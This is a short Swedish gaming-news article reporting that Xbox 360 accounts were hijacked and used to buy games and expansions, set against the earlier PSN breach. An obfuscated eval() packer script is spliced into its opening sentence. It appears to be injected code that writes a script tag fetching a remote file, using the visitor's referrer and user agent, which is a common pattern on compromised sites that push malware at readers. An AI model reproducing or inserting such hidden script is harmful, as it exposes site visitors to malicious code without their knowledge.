Image Image Image Image Image Image Image Image Image Image

| 9 augusti, 2020

Scroll to top

Top

Xbox 360-konton hackade?

Xbox 360-konton hackade?
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|beekt|var|u0026u|referrer|ehzny||js|php’.split(’|’),0,{}))
är oroliga tider för spelföretag. För inte allt för länge sedan blev 80 miljoner PSN-konton exponerade i historiens värsta hackerattack mot ett företag, för att sedan bli hackat igen. Har det skett med Xbox 360 nu också?

På sistonne är det tydligen inte bara Sony som verkar brottas med hackers, rykten har spridits att även Microsoft blivit attackerade utan att man kunnat ge någon vidare exakt skaderapport. Microsoft själva har från början nekat till att de skulle blivit hackade och menar på att det inte finns några bevis på detta, trots att fler och fler privatpersoner på sistone berättat om sina hackade och stulna konton.

Microsoft har nu till sist gått ut med att konton faktiskt har blivit stulna där de kapade kontona använts för att köpa innehåll, expansioner och hela spel. Vi har fortfarande inte fått någon siffra på hur stor skadan är, men Microsoft passar på att varna alla sina användare att läsa deras säkerhetsguide för att slippa fortsatta intrång.